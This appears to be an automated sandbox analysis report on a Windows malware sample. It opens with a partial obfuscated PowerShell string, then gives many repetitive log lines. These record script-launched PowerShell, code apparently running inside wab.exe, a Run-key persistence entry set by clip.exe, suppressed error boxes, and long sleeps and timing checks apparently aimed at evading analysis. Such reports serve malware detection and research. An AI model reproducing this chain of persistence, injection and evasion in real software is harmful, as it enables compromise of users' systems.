'.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCD0983 push E85DB25Dh; ret 2_2_00007FFAACCD09F9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACDA07E8 push eax; ret 2_2_00007FFAACDA07E9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473E3B0 push eax; retf 14_2_0473E3B1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473FE02 push esp; retf 14_2_0473FE09
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_075A08C2 push eax; mov dword ptr [esp], ecx14_2_075A0AC4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8AFA3 push es; retf 18_3_06A8AFA4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8A42F push cs; retf 18_3_06A8A430
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A89F07 push cs; iretd 18_3_06A89F08
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A87042 push AA369B36h; iretd 18_3_06A87081
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A86F59 push AA369B36h; iretd 18_3_06A87081
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8A554 push es; ret 18_3_06A8A5BE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8EBB3 push es; retf 18_3_06A8EBB4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A92127 push cs; iretd 18_3_06A92128
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8E03F push cs; retf 18_3_06A8E040
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8DB17 push cs; iretd 18_3_06A8DB18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8E164 push es; ret 18_3_06A8E1CE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A92867 push ds; retf 18_3_06A92868
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A92373 push 00000078h; retf 18_3_06A92375
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A90D43 push cs; retf 18_3_06A90D44
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A90445 push cs; retf 18_3_06A90446
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F0B5 pushad ; ret 18_3_06A7F0C1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7DC80 pushad ; ret 18_3_06A7DC81
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F18F pushad ; ret 18_3_06A7F199
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7DB9D pushad ; ret 18_3_06A7DBA9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F4EC pushad ; ret 18_3_06A7F4F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F5C5 pushad ; ret 18_3_06A7F5D1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7E337 pushad ; ret 18_3_06A7E341
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7CB34 push es; ret 18_3_06A7CB48
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7D26D push eax; retf 18_3_06A7D275
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7ED57 pushad ; ret 18_3_06A7ED61
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7E25D pushad ; ret 18_3_06A7E269
          Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1RTLGNO0FDJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1RTLGNO0FDJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D1C0 rdtsc 22_2_0438D1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4803Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5098Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5724Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4103Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 822Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 4345Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 5629Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 3.0 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6880Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 5724 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 4103 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8136Thread sleep count: 822 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520Thread sleep count: 4345 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520Thread sleep time: -8690000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520Thread sleep count: 5629 > 30Jump to behavior
